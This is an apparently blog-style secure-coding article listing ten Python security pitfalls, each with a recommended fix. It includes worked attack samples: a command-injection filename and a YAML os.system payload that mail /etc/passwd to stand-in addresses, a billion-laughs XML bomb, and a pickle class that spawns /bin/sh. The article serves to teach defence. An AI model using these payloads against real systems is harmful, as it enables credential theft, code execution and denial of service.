Writing secure code is hard. When you learn a language, a module or a framework, you learn how it supposed to be used. When thinking about security, you need to think about how it can be misused. Python is no exception, even within the standard library there are documented bad practices for writing hardened applications. Yet, when I’ve spoken to many Python developers they simply aren’t aware of them.
Here are my top 10, in no particular order, common gotchas in Python applications.
Injection attacks are broad and really common and there are many types of injection. They impact all languages, frameworks and environments.
SQL injection is where you’re writing SQL queries directly instead of using an ORM and mixing your string literals with variables. I’ve read plenty of code where “escaping quotes” is deemed a fix. It isn’t. Familiarise yourself with all the complex ways SQL injection can happen with this cheatsheet.
Command injection is anytime you’re calling a process using popen, subprocess, os.system and taking arguments from variables. When calling local commands there’s a possibility of someone setting those values to something malicious.
Imagine this simple script [credit]. You call a subprocess with the filename as provided by the user:
import subprocessdef transcode_file(request, filename): command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename) subprocess.call(command, shell=True) # a bad idea!
The attacker sets the value of filename to "; cat /etc/passwd | mail them@domain.com
or something equally dangerous.
Sanitise input using the utilities that come with your web framework, if you’re using one. Unless you have a good reason, don’t construct SQL queries by hand. Most ORMs have builtin sanitization methods.
For the shell, use the shlex
module to escape input correctly.
If your application ever loads and parses XML files, the odds are you are using one of the XML standard library modules. There are a few common attacks through XML. Mostly DoS-style (designed to crash systems instead of exfiltration of data). Those attacks are common, especially if you’re parsing external (ie non-trusted) XML files.
One of those is called “billion laughs”, because of the payload normally containing a lot (billions) of “lols”. Basically, the idea is that you can do referential entities in XML, so when your unassuming XML parser tries to load this XML file into memory it consumes gigabytes of RAM. Try it out if you don’t believe me :-)
<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>
Another attack uses external entity expansion. XML supports referencing entities from external URLs, the XML parser would typically fetch and load that resource without any qualms. “An attacker can circumvent firewalls and gain access to restricted resources as all the requests are made from an internal and trustworthy IP address, not from the outside.”
Another situation to consider is 3rd party packages you’re depending on that decode XML, like configuration files, remote APIs. You might not even be aware that one of your dependencies leaves itself open to these types of attacks.
So what happens in Python? Well, the standard library modules, etree, DOM, xmlrpc are all wide open to these types of attacks. It’s well documented https://docs.python.org/3/library/xml.html#xml-vulnerabilities
Use defusedxml as a drop-in replacement for the standard library modules. It adds safe-guards against these types of attacks.
Don’t use assert statements to guard against pieces of code that a user shouldn’t access. Take this simple example
def foo(request, user):assert user.is_admin, “user does not have access”
Now, by default Python executes with __debug__
as true, but in a production environment it’s common to run with optimizations. This will skip the assert statement and go straight to the secure code regardless of whether the user is_admin
or not.
Only use assert statements to communicate with other developers, such as in unit tests or in to guard against incorrect API usage.
Timing attacks are essentially a way of exposing the behaviour and algorithm by timing how long it takes to compare provided values. Timing attacks require precision, so they don’t typically work over a high-latency remote network. Because of the variable latency involved in most web-applications, it’s pretty much impossible to write a timing attack over HTTP web servers.
But, if you have a command-line application that prompts for the password, an attacker can write a simple script to time how long it takes to compare their value with the actual secret. Example.
There are some impressive examples such as this SSH-based timing attack written in Python if you want to see how they work.
Use secrets.compare_digest
, introduced in Python 3.5 to compare passwords and other private values.
Python’s import system is very flexible. Which is great when you’re trying to write monkey-patches for your tests, or overload core functionality.
But, it’s one of the biggest security holes in Python.
Installing 3rd party packages into your site-packages, whether in a virtual environment or the global site-packages (which is generally discouraged) exposes you to security holes in those packages.
There have been occurrences of packages being published to PyPi with similar names to popular packages, but instead executing arbitrary code. The biggest incidence, luckily wasn’t harmful and just “made a point” that the problem is not really being addressed..
Another situation to think about is the dependencies of your dependencies (and so forth). They could include vulnerabilities and they could also override default behaviour in Python via the import system.
Vet your packages. Look at PyUp.io and their security service. Use virtual environments for all applications and ensure your global site-packages is as clean as possible. Check package signatures.
To create temporary files in Python, you’d typically generate a file name using [mktemp()](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp")
function and then create a file using this name. “This is not secure, because a different process may create a file with this name in the time between the call to [mktemp()](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp")
and the subsequent attempt to create the file by the first process.” [1] This means it could trick your application into either loading the wrong data or exposing other temporary data.
Recent versions of Python will raise a runtime warning if you call the incorrect method.
Use the tempfile
module and use mkstemp
if you need to generate temporary files.
To quote the PyYAML documentation:
“Warning: It is not safe to call
**yaml.load**
with any data received from an untrusted source!**yaml.load**
is as powerful as**pickle.load**
and so may call any Python function.”
This beautiful example found in the popular Python project Ansible. You could provide Ansible Vault with this value as the (valid) YAML. It calls os.system()
with the arguments provided in the file.
!!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"]
So, effectively loading YAML files from user-provided values leaves you wide-open to attack.
Demo of this in action, credit Anthony Sottile
Use yaml.safe_load
, pretty much always unless you have a really good reason.
Deserializing pickle data is just as bad as YAML. Python classes can declare a magic-method called __reduce__
which returns a string, or a tuple with a callable and the arguments to call when pickling. The attacker can use that to include references to one of the subprocess modules to run arbitrary commands on the host.
This wonderful example shows how to pickle a class that opens a shell in Python 2. There are plenty more examples of how to exploit pickle.
import cPickleimport subprocessimport base64
class RunBinSh(object):def __reduce__(self):return (subprocess.Popen, (('/bin/sh',),))
print base64.b64encode(cPickle.dumps(RunBinSh()))
Never unpickle data from an untrusted or unauthenticated source. Use another serialization pattern instead, like JSON.
Most POSIX systems come with a version of Python 2. Typically an old one.
Since “Python”, ie CPython is written in C, there are times when the Python interpreter itself has holes. Common security issues in C are related to the allocation of memory, so buffer overflow errors.
CPython has had a number of overrun or overflow vulnerabilities over the years, each of which have been patched and fixed in subsequent releases.
So you’re safe. That is, if you patch your runtime.
Here’s an example from 2.7.13 and below, an integer overflow vulnerability that enables code execution. That’s pretty much any un-patched version of Ubuntu pre-17.
Install the latest version of Python for your production applications, and patch it!
Similar to not patching your runtime, you also need to patch your dependencies regularly.
I find the practice of “pinning” versions of Python packages from PyPi in packages terrifying. The idea is that “these are the versions that work” so everyone leaves it alone.
All of the vulnerabilities in code I’ve mentioned above are just as important when they exist in packages that your application uses. Developers of those packages fix security issues. All the time.
Use a service like PyUp.io to check for updates, raise pull/merge requests to your application and run your tests to keep the packages up to date.
Use a tool like InSpec to validate the installed versions on production environments and ensure minimal versions or version ranges are patched.
There’s a great static linter that will catch all of these issues in your code, and more!
It’s called bandit, just pip install bandit
and bandit ./codedir
PyCQA/bandit_bandit - Bandit is a tool designed to find common security issues in Python code._github.com
Credit to RedHat for this great article that I used in some of my research.